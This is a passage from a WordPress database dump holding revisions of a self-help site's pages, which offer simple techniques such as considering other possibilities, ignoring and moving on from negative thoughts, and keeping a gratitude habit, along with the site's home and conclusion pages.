meâ€, which did not match the reality of the situation. Let us now imagine a different direction this scenario could have taken. Let us start with Sally having the thought, â€œRupa must be angry with me.â€ Sally then says â€œpauseâ€ to herself to still the thought. At this point, she asks herself, â€œWhat other possibilities are there for Rupa not smiling at me?â€. Asking this question forces Sally to think of other possibilities and she thinks to herself, â€œMaybe Rupa is suffering from migraine like she sometimes does, or maybe she is stressed about some work issue or maybe she had a tiring morning coming to work.â€ This â€œthinking of other possibilitiesâ€ makes Sally realise that the original thought that she had is not the only possible thought. In other words, there is a good chance that the thought, â€œRupa is angry with me, may not even be correct, as there are other thoughts that also could be correct.â€ In this way, the â€œother possibilitiesâ€ tool can reduce the â€œpowerâ€ of the original negative thought. As Sally decides to ignore the negative thought and move on to doing her office tasks, it will soon fade away.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As the above example shows, by finding other possible thoughts, one can see things in a more â€œbalancedâ€ way, instead of focusing oneâ€™s attention only on one fixed and potentially inaccurate thought.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/reality-check/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/gratitude/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'â€œOther possibilitiesâ€ tool', '', 'inherit', 'closed', 'closed', '', '1661-revision-v1', '', '', '2023-08-09 18:34:05', '2023-08-09 18:34:05', '', 1661, 'https://www.happythinking.com/?p=2071', 0, 'revision', '', 0),
(2072, 1, '2023-08-09 18:36:19', '2023-08-09 18:36:19', '<!-- wp:paragraph -->\n<p>As you know, negative thinking patterns are about seeing things in a way that does not represent reality. The â€œreality checkâ€ tool that we discussed before works by one not finding evidence to back up negative thoughts. Here, I will describe another approach you can take, which is by using what I call the â€œother possibilitiesâ€ tool. This would be best understood with the use of an example.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us imagine that Sally and her good friend Rupa are working in an office. One day, as Sally and Rupa see each other for the first time in the morning, Rupa doesnâ€™t smile and even appears to ignore Sally. Sally immediately jumps to the conclusion, â€œRupa must be angry with me.â€ For the rest of the morning, Sally is in a distressed state, trying to work out why Rupa must be angry with her. This goes on till lunchtime when Sally sees Rupa again. This time, Rupa smiles broadly and says, â€œThis morning was so stressful. My boss had wanted me to do some calculations for him, and I had worked on it all weekend on my laptop. Yet this morning, the document with all the calculations seemed to have gone missing from my laptop and I was so terrified about going to the meeting. Luckily, at the meeting, there was this guy who is really good with computers and he somehow located the missing document, and whew, everything was fine after that!â€&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you can see, in this example, Sally had unnecessarily suffered a whole morning because of the negative thought, â€œRupa must be angry with meâ€, which did not match the reality of the situation. Let us now imagine a different direction this scenario could have taken. Let us start with Sally having the thought, â€œRupa must be angry with me.â€ Sally then says â€œpauseâ€ to herself to still the thought. At this point, she asks herself, â€œWhat other possibilities are there for Rupa not smiling at me?â€. Asking this question forces Sally to think of other possibilities and she thinks to herself, â€œMaybe Rupa is suffering from migraine like she sometimes does, or maybe she is stressed about some work issue or maybe she had a tiring morning coming to work.â€ This â€œthinking of other possibilitiesâ€ makes Sally realise that the original thought that she had is not the only possible thought. In other words, there is a good chance that the thought, â€œRupa is angry with me, may not even be correct, as there are other thoughts that also could be correct.â€ In this way, the â€œother possibilitiesâ€ tool can reduce the â€œpowerâ€ of the original negative thought. As Sally decides to ignore the negative thought and move on to doing her office tasks, it will soon fade away.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As the above example shows, by finding other possible thoughts, one can see things in a more â€œbalancedâ€ way, instead of focusing oneâ€™s attention only on one fixed and potentially inaccurate thought.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/reality-check/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/ignore-move-on/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'â€œOther possibilitiesâ€ tool', '', 'inherit', 'closed', 'closed', '', '1661-revision-v1', '', '', '2023-08-09 18:36:19', '2023-08-09 18:36:19', '', 1661, 'https://www.happythinking.com/?p=2072', 0, 'revision', '', 0),
(2077, 1, '2023-08-09 18:40:02', '2023-08-09 18:40:02', '<!-- wp:paragraph -->\n<p>There is a very simple tool that can be used to help one to be happy, and that is the act of being â€œgratefulâ€. Studies have shown that being thankful (i.e. gratitude) helps to improve oneâ€™s mental health. The gratitude tool is about developing a habit of being grateful.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Often, especially when things are not great, it is easy to think that there is nothing to be grateful for. Perhaps this is because our minds tend to ignore positive aspects of our lives and instead, focus only on negativity. When one looks for things to be grateful for, one should not only focus on â€œbigâ€ things. While of course, one should not ignore big things, it is also important to actively look for â€œsmallâ€ things as well. Let me give you an example. Imagine that a person, who we will call Mark, has severe arthritis that limits his mobility and makes it difficult for him to venture out of his house. However, on this day, he does manage to go for a short walk up and down the street he lives in. That evening, as part of the â€œgratitude toolâ€ that he uses every day, Mark thinks of things to be grateful for. He tells himself, â€œToday I am grateful that I was able to walk up and down my street and was able to enjoy the outdoors a little bit. Another thing that I am grateful for is the phone call that my friend Sam made to me. It was great chatting with him and it made me feel better.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you may have noticed in the example, the things that one can be grateful for don''t have to be major. Just a few everyday things can work as well. Initially, one may need to spend some extra effort looking for things to be grateful for, as oneâ€™s mind may have gotten used to ignoring such things. One could even choose very simple things like being grateful for the person smiling at you at the supermarket.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When using the gratitude tool, try to be a bit creative. One doesnâ€™t have to always choose the same things every day, such as, â€œI am grateful for my loving family.â€ If one keeps saying the same things every day (e.g. loving family), then oneâ€™s mind may not â€œlearnâ€ to look for things to be grateful for. Try to look for different small things every day to be grateful for.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, when looking for things to be grateful for, there are a few things you need to be careful about. One should not excessively focus on being grateful to people who one may feel under obligation to, either emotionally or materially (e.g. someone who has lent one money). I am not saying that one should not acknowledge such persons. But excessively doing so may bring oneâ€™s mood down, as one may feel constantly indebted to those people and develop a sense of being helpless. It''s also important to not let the gratitude tool be about being happy about others'' misfortunes. (e.g. â€œAt least I am not as poor as my neighbour, Mary.â€). That would make the gratitude tool a negative exercise. Rather, one should just be grateful for good things that have happened to oneself without comparing them to those less fortunate than oneself.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When using the gratitude tool, most people will use their â€œinner voiceâ€ to express their gratitude. However, some might find it useful to write these thoughts in a notebook or diary (â€œgratitude journalâ€). At times, one might even be able to directly express gratitude to someone (e.g. â€œThank you for visiting me, you made me feel better.â€)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Remembering to be grateful can be a challenge and one may need to develop a way of reminding oneself to be grateful. Perhaps, for example, one can put a daily reminder on oneâ€™s phone diary, to remind oneself every day, at a convenient time, to be grateful, perhaps with a screen message, â€œGrateful Tool time!â€. Another approach can be to just make it a habit at an easy to remember time of the day, such as when getting into bed in the evening.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As one regularly uses the gratitude tool, one will find that oneâ€™s mind will look at the world in a less negative manner.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>By the way, I am very grateful that you are visiting this website! I feel thankful that I have the opportunity to share my thoughts with you.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/other-possibilities/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/conclusion/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Gratitude tool', '', 'inherit', 'closed', 'closed', '', '1664-revision-v1', '', '', '2023-08-09 18:40:02', '2023-08-09 18:40:02', '', 1664, 'https://www.happythinking.com/?p=2077', 0, 'revision', '', 0);
INSERT INTO `wpou_posts` VALUES
(2075, 1, '2023-08-09 18:38:28', '2023-08-09 18:38:28', '<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the previous section, you learnt about the â€œreality checkâ€ tool. When using that tool, most of the time, one will find that when looking for evidence to support the negative thought, that thought just disappears, almost as if that thought realises on its own that it is no longer valid. However, sometimes one may find that even though one has shown that there is little evidence to support a negative thought, that thought may still â€œhang aroundâ€. If this were to happen, it is crucial that one does not â€œpushâ€ the negative thought away. As I explained to you when describing the pause tool, trying to stop or push away a thought can actually have the opposite effect, where the thought comes back even more. A much better option is to let the thought hang around as much as it likes, but crucially, since one knows that the thought is not valid, one can just ignore it. â€œIgnoringâ€ means that even though the thought is present, one does not react to it. One does not react to the thought because one knows, by using the reality check tool, that the negative thought does not represent reality. Ultimately a thought that one does not react to will disappear, just like if one does not react to a friend, that friend will soon get bored and will leave!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A very effective way to help ignore a thought is to add another step, which I call â€œMove onâ€. Essentially, after one decides to ignore a thought, one moves oneâ€™s mindâ€™s attention onto something else. Let me explain using the example we used in the previous sections, where Jayâ€™s partner was a bit late returning home from work. You will note that one can often use multiple combinations of tools together. This is sort of like how a mechanic will often use more than one tool when repairing a machine.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So putting all this together, let''s see an example of the â€œIgnore/ Move onâ€ tool in use.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We start with Jayâ€™s partner not being home 10 minutes past the usual time she normally returns home from work. Jay has the negative thought, â€œShe must have had a terrible road traffic accidentâ€. Jay then uses the â€œpause toolâ€ where he uses his internal voice and says â€œpauseâ€ to himself. He then applies the reality check tool to the paused thought, and asks himself, â€œWhat actual evidence do I have that supports my thought that my partner has had a terrible road traffic accident?â€. As Jay looks for evidence, he realises that he actually does not have any evidence that his partner has met with a road traffic accident. Since he still has the negative thought lingering in the background of his mind, he decides to use the ignore &amp; move on tool. Using his internal voice, he says to himself â€œIgnore and Move onâ€. He doesnâ€™t react to the negative thought and lets it be. He then moves on to a different thought, which on this occasion happens to be thinking of what he will be cooking for dinner. Eventually, Jayâ€™s negative thought fades away, avoiding him having unnecessary distress.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As I tell you about these tools, you may think they are complex. In reality, they are very easy to do in practice. The tools may appear to be â€œlengthyâ€, but that is only because I am breaking them down into individual steps. While it may take you a while to read and understand the tools, actually using the tools will take you much less time. And of course, like everything, with a bit of practice, it will only get quicker.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/other-possibilities/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/gratitude/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Ignore / Move on tool', '', 'inherit', 'closed', 'closed', '', '1658-revision-v1', '', '', '2023-08-09 18:38:28', '2023-08-09 18:38:28', '', 1658, 'https://www.happythinking.com/?p=2075', 0, 'revision', '', 0),
(2078, 1, '2023-08-09 18:42:33', '2023-08-09 18:42:33', '<!-- wp:paragraph -->\n<p>So, my friends, you have come to the end of this website and I hope you found it interesting and useful. However, in reality, this is not truly the end! Let me explain.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For many years, I planned to make this website about happy thinking. It had been a dream of mine for a long while. Unfortunately, all these years, the website only existed in my head. The reason for this is actually that I suffered from the unhelpful thinking pattern of trying to be a perfectionist. Perfectionism made me fear failure, making me not even start this website. Then one day it dawned on me that actually if I did not overcome the unhelpful thinking pattern of trying to be perfect, this website would never ever materialise. I, therefore, forced myself to get in front of my keyboard and started writing, without worrying about the outcome. Luckily things started flowing, and what you read is the version so far. I hope you liked it.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, I am determined to further work on this website in the coming months. I plan to add more unhelpful thinking patterns and also more tools. I also plan to improve the material already present. To make the content easier and fun to read, I will be adding plenty of diagrams as well.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Eventually, I will add a dedicated section containing loads of short examples demonstrating the various tools. I believe examples will go a long way in making things clearer. Finally, I also plan to add bits of wisdom from various sources, to help you along your journey to happiness. In essence, there will be lots more material&nbsp; and what I am saying is, â€œPlease visit this website again!â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I do this website completely on my own using my own funds. If you are able to, I would be very grateful if you would consider donating the equivalent of one dollar to help with the running costs. To do so, you can go to the donate page by clicking <a href="https://www.happythinking.com/donate/">HERE</a>. I am short of funds so every little bit will help.Â </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I wish you bye for now. I sincerely hope to see you again soon. Happy Thinking!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/gratitude/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Conclusion', '', 'inherit', 'closed', 'closed', '', '1667-revision-v1', '', '', '2023-08-09 18:42:33', '2023-08-09 18:42:33', '', 1667, 'https://www.happythinking.com/?p=2078', 0, 'revision', '', 0),
(2118, 1, '2024-01-11 16:30:23', '2024-01-11 16:30:23', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":2059,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking080723.jpg" alt="" class="wp-image-2059"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:spacer {"height":"25px"} -->\n<div style="height:25px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This free website will share with you the concept of â€œHappy Thinkingâ€ which can help you to achieve happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. According to psychologists, over time, oneâ€™s mind may develop certain ways of thinking that are not helpful to oneâ€™s mental well-being. Such unhelpful ways of thinking are very common and one may not even realise that one is thinking in such ways.  To achieve happiness in one''s life, it is important to recognise and change unhelpful ways of thinking. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this free website, I will describe common types of unhelpful thinking that people do. This will help you to recognise unhelpful thinking when it happens to you. I will also explain to you various simple and practical methods that you can use to deal with unhelpful thinking in your daily life. As you change unhelpful ways of thinking you will find yourself becoming happier.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I will also share with you bits of wisdom about happiness that I have gathered from various places. Such wisdom can help you to see the world in a more accepting and positive way.Â </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>These three ingredients, i.e. recognising unhelpful thinking, applying methods to deal with it and using wisdom to see the world differently, together make the concept of â€œHappy Thinkingâ€. I am confident that practising Happy Thinking will help you to find happiness in your life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website on Happy Thinking is truly free. There is nothing to buy, download, register or any other sales tactics. All I wish is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Find happiness by changing how you think', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2024-01-11 16:30:23', '2024-01-11 16:30:23', '', 88, 'https://www.happythinking.com/?p=2118', 0, 'revision', '', 0),
(2081, 1, '2023-08-12 15:21:31', '2023-08-12 15:21:31', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":2059,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking080723.jpg" alt="" class="wp-image-2059"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:spacer {"height":"15px"} -->\n<div style="height:15px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This free website will share with you the concept of â€œHappy Thinkingâ€ which can help you to achieve happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in one''s happiness. Over time, oneâ€™s mind may have developed certain ways of thinking that are not helpful to oneâ€™s mental well-being. Such â€œunhelpful ways of thinkingâ€ are very common and can happen to anyone. One may not even realise that one is thinking in such ways.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If you are to achieve the best possible happiness in your life, it is important to recognise and change unhelpful ways of thinking when it happens to you. On this free website, I will describe to you the common types of unhelpful thinking that people do. This will help you to recognise unhelpful thinking when it happens to you. I will also explain to you various mental tools that you can use to deal with unhelpful thinking. Such mental tools will be very practical so that you will be able to use them in your daily life. As you change your thinking from unhelpful to helpful ways, you will find yourself becoming happier.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In addition to describing types of unhelpful thinking and giving tools to change such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help one to see the world in a more accepting and positive way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>These three ingredients, i.e. recognising unhelpful thinking, using mental tools to deal with it and using wisdom to see the world differently, together make the concept of â€œHappy Thinkingâ€. I am confident that practising happy thinking will help you to find happiness in your life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2054,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/cauldron_060823.jpg" alt="" class="wp-image-2054"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>This website on happy thinking is truly free for you (and your family and friends!) to benefit from. There is nothing to buy, download, register or any other sales tactics. All I wish is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Find happiness by changing how you think', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-08-12 15:21:31', '2023-08-12 15:21:31', '', 88, 'https://www.happythinking.com/?p=2081', 0, 'revision', '', 0),
(2082, 1, '2023-08-12 15:24:25', '2023-08-12 15:24:25', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":2059,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking080723.jpg" alt="" class="wp-image-2059"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:spacer {"height":"25px"} -->\n<div style="height:25px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This free website will share with you the concept of â€œHappy Thinkingâ€ which can help you to achieve happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in one''s happiness. Over time, oneâ€™s mind may have developed certain ways of thinking that are not helpful to oneâ€™s mental well-being. Such â€œunhelpful ways of thinkingâ€ are very common and can happen to anyone. One may not even realise that one is thinking in such ways.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If you are to achieve the best possible happiness in your life, it is important to recognise and change unhelpful ways of thinking when it happens to you. On this free website, I will describe to you the common types of unhelpful thinking that people do. This will help you to recognise unhelpful thinking when it happens to you. I will also explain to you various mental tools that you can use to deal with unhelpful thinking. Such mental tools will be very practical so that you will be able to use them in your daily life. As you change your thinking from unhelpful to helpful ways, you will find yourself becoming happier.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In addition to describing types of unhelpful thinking and giving tools to change such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help one to see the world in a more accepting and positive way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>These three ingredients, i.e. recognising unhelpful thinking, using mental tools to deal with it and using wisdom to see the world differently, together make the concept of â€œHappy Thinkingâ€. I am confident that practising happy thinking will help you to find happiness in your life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2054,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/cauldron_060823.jpg" alt="" class="wp-image-2054"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>This website on happy thinking is truly free for you (and your family and friends!) to benefit from. There is nothing to buy, download, register or any other sales tactics. All I wish is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Find happiness by changing how you think', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-08-12 15:24:25', '2023-08-12 15:24:25', '', 88, 'https://www.happythinking.com/?p=2082', 0, 'revision', '', 0),
